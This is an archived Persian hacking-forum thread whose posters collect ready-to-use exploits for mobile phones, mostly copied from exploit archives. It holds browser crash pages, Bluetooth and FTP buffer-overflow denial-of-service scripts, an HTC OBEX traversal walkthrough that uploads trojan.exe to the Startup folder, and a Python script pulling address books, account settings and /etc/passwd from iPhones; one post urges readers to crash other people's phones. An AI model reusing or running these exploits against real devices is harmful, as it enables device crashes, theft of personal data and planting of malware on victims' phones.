اکسپلویت های موبایل [بایگانی] - انجمن گروه آشیانه - آموزش امنیت و راه های مقابله با هک

PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : اکسپلویت های موبایل

Encoder

02-21-2010, 11:43 PM

با سلام خدمت همه کاربران عزیز . در این تاپیک به کمک یکدیگر مرجعی از اکسپلویت های موبایل درست می کنیم ! این تاپیک از تاپیک مخصوص هک موبایل مهمتر و کارآمد تر خواهد بود ! هر اکسپلویتی که برای موبایل می یابید و یا می نویسید در این بخش قرار دهید !

با تشکر از همکاری شما heart

امیدوارم بزرگترین مرجع اکسپلویت موبایل توی اینترنت باشه ;)

Encoder

02-21-2010, 11:43 PM

# Apple iPhone (MobileSafari) Crash & Reboot
# TheLeader, GSOG2009 [st0p] hotmail [sp4m] com
# Shoutz: hacking.org.il, nullbyte.org.il

# Tested on iPod Touch 2G, OS 2.2.1
# Launch MobileSafari, enter the page and MobileSafari will freeze.
# Wait for 4-5 minutes and the device will spontaneously reboot.

# Exploit:

<html>
<body>
**********
var a = '';
for (var i = 1; i <= 500000; i++)
{
a += '\n';
}
alert(a);
</script>
</body>
</html>

Encoder

02-21-2010, 11:44 PM

I shall complete the information related to Bugtraq ID: 33359

Title: HTC / Windows Mobile OBEX FTP Service Directory Traversal
Author: Alberto Moreno Tablado
Vendor: HTC
Vulnerable Products:
- HTC devices running Windows Mobile 6
- HTC devices running Windows Mobile 6.1
Non vulnerable products:
- HTC devices running Windows Mobile 5.0
- Other vendors’ Windows Mobile devices
References: [Only registered and activated users can see links]

Summary:
HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. This can be leveraged for code execution by writing to a Startup folder.

Description:
There exists a Directory Traversal vulnerability in the OBEX FTP Service in the Bluetooth Stack implemented in HTC devices running Windows Mobile 6 and Windows Mobile 6.1. The OBEX FTP server is located in \Windows\obexfile.dll. Microsoft states this is a 3rd party driver developed by HTC and installed on HTC devices running Windows Mobile, so the vulnerability only affects to this vendor specifically.

A remote attacker (who previously owned authentication and authorization rights) can use tools like ObexFTP or gnomevfs-ls from a Linux box to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks.

The only requirement is that the attacker must have authentication and authorization privileges over Bluetooth. Pairing up with the remote device should be enough to get it; however, more sophisticated attacks, such as sniffing the Bluetooth pairing, linkkey cracking and BD_ADDR address spoofing, can be used in order to avoid this. Devices must have Bluetooth enabled and File Sharing over Bluetooth service active when the attack is performed. In case the attacker succeeded in getting the proper privileges, further actions will be transparent to the user.

The scope of the Directory Traversal vulnerability allows the attacker to traverse to parent directories out of the default Bluetooth shared folder by using ../ or ..\\ marks. This security flaw leads to browse folders located anywhere in the file system, download files contained in any folder as well as upload files to any folder.

A remote attacker who previously owned authentication and authorization rights over Bluetooth can perform three risky actions on the device:

1) Browse directories located out of the limits of the default shared folder

An attacker can discover the structure of the file system and access to any directory within it, including:
- The flash hard drive
- The external storage card
- The internal mass storage memory, included in specific HTC devices

2) Download files without permission

An attacker can download sensitive files located anywhere in the file system, such as:
- personal pictures and documents located in \My Documents or any other directory
- Contacts, Calendar & Tasks information located in \PIM.vol
- Temporary internet cache and cookies located in \Windows\Profiles\guest\
- emails located in \Windows\Messaging

gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Messaging"
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Receiving "../../Windows/Messaging"... Sending ".."... Sending ".."... Sending "Windows"... done
<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="Windows" />
<folder name="Attachments" created="20090119T171318Z"/>
<file name="6238002d81030102.mpb" created="20090119T173434Z" size="1521"/>
<file name="6839002d81030102.mpb" created="20090119T171828Z" size="2659"/>
</folder-listing>
done
Disconnecting...done
gospel@gospel-shift:~/bluez$

3) Upload malicious files

An attacker can replace third party or system executable files with malicious files as well as upload trojans to any place in the filesystem, such as \Windows\Startup and, therefore, shall be executed the next time Windows Mobile inits.

gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -c "../../Windows/Startup" -p trojan.exe
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Sending ".."... Sending ".."... Sending "Windows"... Sending "Startup"... done
Sending "trojan.exe"...\done
Disconnecting...done
gospel@gospel-shift:~/bluez$ obexftp -b 00:17:83:02:BA:3C -l "../../Windows/Startup"
Browsing 00:17:83:02:BA:3C ...
Channel: 4
Connecting...done
Receiving "../../Windows/Startup"... Sending ".."... Sending ".."... Sending "Windows"... done
<?xml version="1.0"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder name="Windows" />
<file name="trojan.exe" created="20090122T121924Z" size="266168"/>
<file name="poutlook.lnk" created="20061231T230022Z" size="14"/>
</folder-listing>
done
Disconnecting...done
gospel@gospel-shift:~/bluez$

About affected and non affected products:
The following HTC devices are affected by this vulnerability:
- HTC devices running Windows Mobile 6 Professional
- HTC devices running Windows Mobile 6 Standard
- HTC devices running Windows Mobile 6.1 Professional
- HTC devices running Windows Mobile 6.1 Standard

You can find a list of tested HTC devices proved to be vulnerable at [Only registered and activated users can see links]

HTC devices running Windows Mobile 5.0 are not affected because the OBEX FTP service is not implemented in that OS version.

Other vendors’ Windows Mobile devices are not affected either: ASUS, Samsung, LG, ...

Vendor Status:
The vulnerability was first disclosed on 2009/01/19 as a whole Microsoft Bluetooth Stack issue in Windows Mobile 6 Professional. Subsequent tests proved that several Windows Mobile 6 Standard and Windows Mobile 6.1 Professional devices were also vulnerable. Microsoft was contacted on 2009/01/22 and this information was not made public because last mobile phones manufactured were vulnerable.

Further investigations proved that the issue is in a 3rd party driver installed by HTC, this vulnerability only affects to HTC devices and other vendors’ Windows Mobile devices are not affected.

HTC Europe has been contacted since 2009/02/09 and provided with all the details concerning on the exploitation of the flaw. However, no patches are known to be released for this security flaw.

Workaround:
This vulnerability is a zero-day threat. This means that all devices shipped up to date (July 2009) may be vulnerable.

Wait for proper vendor response and updates.

Do not accept pairing nor connection requests from unknown sources. Delete old entries in the paired devices list.

Alberto

Encoder

02-21-2010, 11:45 PM

#!/usr/bin/perl
#
# ----------WM6 remote overflow reboot PoC----------
# Simple exploit for remote rebooting a windows mobile device
# Maybe we can use it for doing command execution,
# I've not test it since the device is rebooting and do not dump a core
# for further analysing.
#
# The bug is not realy in the long string name but when it's the first
# time the wm6 device try to get a connection with too long name.
#
# There's two way to exploit this bug, this PoC show the first method
# (direct connect to the device if we know the bdaddr) but you can
# just wait for the device to search and overflow by itself when
# seeing the hci name:
# hciconfig <hci dev> name `perl -e 'print "A"x90000'`
# hciconfig <hci dev> piscan
# You just have to wait until the wm device search for bluetooth devices
# in range and it will be overflowed
#
# *Tested on WM6 fully patched on [HTC wiza 200],[HTC Mda 8125]
# (by Julien Bedard)
#

use Net::Bluetooth;

$target=$ARGV[0];
$hci_dev=$ARGV[1];
$overflow="A" x 90000;
$rfcomm_port="3";

if (@ARGV < 2)
{
die "Usage:\n ./wm6_dos.pl <target_mac> <hci_device>\n\n";
}

# change this lame cmd ???
system("hciconfig $hci_dev name $overflow");

$over_conn = Net::Bluetooth->newsocket("RFCOMM");
print "socket error $!\n" unless(defined($over_conn));
$over_conn->connect($target, $rfcomm_port);

# milw0rm.com [2008-09-26]

Encoder

02-21-2010, 11:46 PM

<html><body>**********

function crash()

{

alert('Nokia Browser Crash by Qode');

shellcode = unescape('%ucccc');

fill = unescape('%ucccc');

addr = 0x02020202;

var b = fill;

while (b.length <= 0x400000) b+=b;

}

</script>

Nokia Browser Crash by Qode<br>

<input type='button' onClick='crash()' value='Crash'>

</body></html>

Encoder

02-21-2010, 11:48 PM

به کمک این اکسپلویت گوشی دیگران را ریست کنید !

طرز کار :

ابتدا باید فایل مورد نظر را (توضیح داده شده) سیو کرده و اسم بلوتوث خود را از آنجا کپی و در بخش Nick Name پیست کنید ! سپس سیو کنید ! هم اکنون هر کسی اسم شما را سرچ کند گوشی اش ریست خواهد شد ! :x

/*
Nokia Bluetab Exploit
Found & coded by Qnix

- This Exploit will creat file called bluetab.txt with your
bluetooth nickname, send the file to your nokia mobile
open it copy the nickname and paste it to your bluetooth
nickname, if any one search and find your nickname his
mobile will restart .
- this exploit work on many other symbian and java mobiles .

Qnix - [Only registered and activated users can see links]

*/

#include <stdio.h>
#define tab1 0x09
#define tab2 0x2E
#define dot1 0x0A

int main(int argc,char *argv[])
{

FILE *bluetab;

if(argc < 2)
{
msgm();
printf("Useage : ./bluetab <nickname>\n");
return 0;
}
else
{
msgm();
printf("bluetab.txt file created with your nickname . \n");
}

bluetab = fopen("bluetab.txt","w");
if(!bluetab)
{
msgm();
printf("Some kind of file error!\n");
return 0;
}

fprintf(bluetab,"%s%c%c%c",argv[1],tab1,tab2,dot1);
fclose(bluetab);
return 0;

}

msgm()
{

printf(" ------------------------------- \n");
printf(" Nokia Bluetab Exploit \n");
printf(" found & coded by \n");
printf(" [Only registered and activated users can see links] \n");
printf(" ------------------------------- \n\n");
}

/* v1 2005-03-04 milw0rm.com */

// milw0rm.com [2005-09-23]

Encoder

02-21-2010, 11:50 PM

/* Sony/Ericsson reset display - PoC */
/* Pierre BETOUIN - [Only registered and activated users can see links] */
/* 05-02-2006 */
/* Vulnerability found using BSS fuzzer : */
/* Download [Only registered and activated users can see links] */
/* */
/* Causes anormal behaviours on some Sony/Ericsson */
/* cell phones */
/* Vulnerable tested devices : */
/* - K600i */
/* - V600i */
/* - K750i */
/* - W800i */
/* - And maybe other ones... */
/* */
/* Vulnerable devices will slowly turn their screen into */
/* black and then display a white screen. */
/* After a short period (~45sec), they will go back to */
/* their normal behaviour */
/* */
/* gcc -lbluetooth reset_display_sonyericsson.c */
/* -o reset_display_sonyericsson */
/* ./reset_display_sonyericsson 00:12:EE:XX:XX:XX */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/l2cap.h>

#define SIZE 4
#define FAKE_SIZE 1 // SIZE - 3 (3 bytes <=> L2CAP header)

int main(int argc, char **argv)
{
char *buffer;
l2cap_cmd_hdr *cmd;
struct sockaddr_l2 addr;
int sock, sent, i;

if(argc < 2)
{
fprintf(stderr, "%s <btaddr>\n", argv[0]);
exit(EXIT_FAILURE);
}

if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0)
{
perror("socket");
exit(EXIT_FAILURE);
}

memset(&addr, 0, sizeof(addr));
addr.l2_family = AF_BLUETOOTH;

if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
{
perror("bind");
exit(EXIT_FAILURE);
}

str2ba(argv[1], &addr.l2_bdaddr);

if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0)
{
perror("connect");
exit(EXIT_FAILURE);
}

if(!(buffer = (char *) malloc ((int) SIZE + 1)))
{
perror("malloc");
exit(EXIT_FAILURE);
}

memset(buffer, 90, SIZE);

cmd = (l2cap_cmd_hdr *) buffer;
cmd->code = L2CAP_ECHO_REQ;
cmd->ident = 1;
cmd->len = FAKE_SIZE;

if( (sent=send(sock, buffer, SIZE, 0)) >= 0)
{
printf("L2CAP packet sent (%d)\n", sent);
}

printf("Buffer:\t");
for(i=0; i<sent; i++)
printf("%.2X ", (unsigned char) buffer[i]);
printf("\n");

free(buffer);
close(sock);
return EXIT_SUCCESS;
}

Encoder

02-21-2010, 11:51 PM

# Apple Safari Iphone Crash using tel:
# Found by cloud : cloud[at]madpowah[dot]org
# [Only registered and activated users can see links]

# Tested on Iphone 3G, OS 3.0.1
# Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear

# Exploit:

<?php
set_time_limit(0);
$var = "";
for ($i=0; $i<100000; $i++){
$var = $var . "A";
}
echo '<iframe src="tel:' . $var .'"></iframe>';
?>

Encoder

02-21-2010, 11:52 PM

Encoder

02-21-2010, 11:53 PM

<html><body>**********

function Demo() {

var shellcode;
var addr;
var fill;

alert('attempting a crash!');
shellcode = unescape('%u0c0c');
fill = unescape('%ucccc');
addr = 0x02020202;

var b = fill;
while (b.length <= 0x40000) b+=b;

var c = new Array();
for (var i =0; i<36; i++) {
c[i] =
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode;
}

}

</script>

<input type='button' onClick='Demo()' value='Go!'>

</body></html>

Encoder

02-21-2010, 11:53 PM

<html>
<img src="[Only registered and activated users can see links]">
</html>

# milw0rm.com [2007-10-11]

Encoder

03-03-2010, 02:30 AM

#!/usr/bin/python
# ,
# dM
# MMr
# 4MMML .
# MMMMM. xf
# . "M6MMM .MM-
# Mh.. +MM5MMM .MMMM
# .MMM. .MMMMML. MMMMMh
# )MMMh. MM5MMM MMMMMMM
# 3MMMMx. 'MMM3MMf xnMMMMMM"
# '*MMMMM MMMMMM. nMMMMMMP"
# *MMMMMx "MMM5M\ .MMMMMMM=
# *MMMMMh "MMMMM" JMMMMMMP
# MMMMMM GMMMM. dMMMMMM .
# MMMMMM "MMMM .MMMMM( .nnMP"
# .. *MMMMx MMM" dMMMM" .nnMMMMM*
# "MMn... 'MMMMr 'MM MMM" .nMMMMMMM*"
# "4MMMMnn.. *MMM MM MMP" .dMMMMMMM""
# ^MMMMMMMMx. *ML "M .M* .MMMMMM**"
# *PMMMMMMhn. *x > M .MMMM**""
# ""**MMMMhx/.h/ .=*"
# .3P"%....
# [t12] nP" "*MMnx

# SMOKE WEED
#greetz to my blackhatz and baycatz
#iPhone CSS::Selector crash
#this Python script acts as a web server and sends a malformed long string to the CSS <style> tag
#this is a remote crash bug, hoever an analysis of the debug dump shows remote code execution capability, I am just lazy

import sys, socket;

def main():
junk = "*>" * 120000;

html = """
<html>
<head>
<style type="text/css">
""";

html += junk;

html += """
body {background: blue;}
</style>
</head>
</html>
""";

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.bind(('',2121));
s.listen(1);

while True:
channel, details = s.accept();
print channel.recv(1024);
channel.send(html);
channel.close();

main();

Encoder

03-03-2010, 02:32 AM

###############
# Title -> iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS
# Model -> Tested on iPod Touch 3G 3.1.3
# Software -> FTPDisc 1.0 and FTPDisc 1.0 Lite [Only registered and activated users can see links]
# Attacker -> Tested from GNU/Linux (Sidux), fuzzing with a future PenTBox version :P
#
# Exploit languaje -> Ruby
# Type -> Remote Denial of Service Exploit caused by Buffer Overflow
#
#
###############
# Discovered and written by Alberto Ortega
# [Only registered and activated users can see links]
###############

require "socket"
require "net/ftp"

expl = ARGV[0]
host = ARGV[1]

puts ""
if !expl || !host
puts "HELP - iPhone / iTouch FTPDisc 1.0 3ExploitsInOne BuffOverflow DoS"
puts ""
puts "Exploits: 1 - USER [MALFORMED] 2 - cd [MALF] 3 - delete [MALF]"
puts ""
puts "- Usage: ftpdisc3io.rb [numberofexploit] [host]"
puts "- Example: ftpdisc3io.rb 1 192.168.1.2"
puts ""
else
buffer = "A"
10.times do
buffer = "#{buffer}#{buffer}" # Here de big buffer to send
end
if expl == "1" # EXPLOIT 1
begin
socket = TCPSocket.new(host, 21)
puts " Exploiting ..."
socket.write("USER #{buffer}\r\n")
puts " Succesfully exploited! :)"
rescue
puts "Connection problem"
end
elsif expl == "2" || expl == "3"
begin
print " Connecting to FTP ... "
ftp = Net::FTP.new(host, "anonymous")
puts "OK"
puts " Exploiting ..."
if expl == "2"
begin
ftp.chdir(buffer) # EXPLOIT 2
rescue
end
else
begin
ftp.delete(buffer) # EXPLOIT 3
rescue
end
end
puts " Succesfully exploited! :)"
rescue
puts "Connection problem"
end
else
puts "Incorrect exploit selection (1, 2, 3)"
end
end
puts ""

SPQ

09-23-2011, 12:27 PM

iPhone/iPad Phone Drive 1.1.1 Directory TraversaliPhone/iPad Phone Drive 1.1.1
Directory Traversal

EDB-ID: 17645 CVE: N/A OSVDB-ID: N/A
Author: IRCRASHPublished: 2011-08-09Verified:
Exploit Code: Vulnerable App: N/A
Rating
Overall: 12345 (0.0)

view sourceprint?
#!/usr/bin/python

#----------------------------------------------------------------

#Software : iPhone/iPad Phone Drive 1.1.1

#Type of vulnerability : Directory Traversal

#Tested On : iPhone 4 (IOS 4.3.3/Jailbroken)

#----------------------------------------------------------------

#Program Developer : [Only registered and activated users can see links]

#----------------------------------------------------------------

#Discovered by : Khashayar Fereidani

#Team Website : [Only registered and activated users can see links]

#English Forums : [Only registered and activated users can see links]

#Team Members : Khashayar Fereidani , Arash Allebrahim

#Email : irancrash [ a t ] gmail [ d o t ] com

#Facebook : [Only registered and activated users can see links]

#Twitter : [Only registered and activated users can see links]

#----------------------------------------------------------------

import urllib2

def urlread(url,file):

url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file

u = urllib2.urlopen(url)

localFile = open('result.html', 'w')

localFile.write(u.read())

localFile.close()

print "file saved as result.html\nIRCRASH.COM 2011"

print "----------------------------------------\n- iPhone/iPad Phone Drive
1.1.1 DT -\n- Discovered by : Khashayar Fereidani -\n-
[Only registered and activated users can see links]
-\n----------------------------------------"

url = raw_input("Enter Address ( Ex. : [Only registered and activated users can see links] ):")

f =
["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]

print f[1]

id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email
Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File
Selection\n Enter ID:"))

if not('[Only registered and activated users can see links]' in url):

url='[Only registered and activated users can see links]'+url

if ((id>0) and (id<6)):

file=f[id]

urlread(url,file)

if (id==6):

file=raw_input("Enter Local File Address : ")

urlread(url,file)

Comments
No comments so far

© Offensive Security 2011

Silic

11-01-2011, 01:51 PM

بي زحمت همون فايل توضيح داده شده رو همينجا براي دانلود بذاريد.
خيلي ممنون

javad13

02-04-2012, 09:14 AM

سلام
من خیلی خیلی عذر خواهم که در این قسمت با توجه به مرجع بودن تاپیک دارم اسپم میدم.....
اما......
روش استفادشون چجوریه؟؟؟؟؟؟؟

بازم از آقای encoder و تمام دوستان عذرخواهی و درخواست کمک دارم
با تشکر....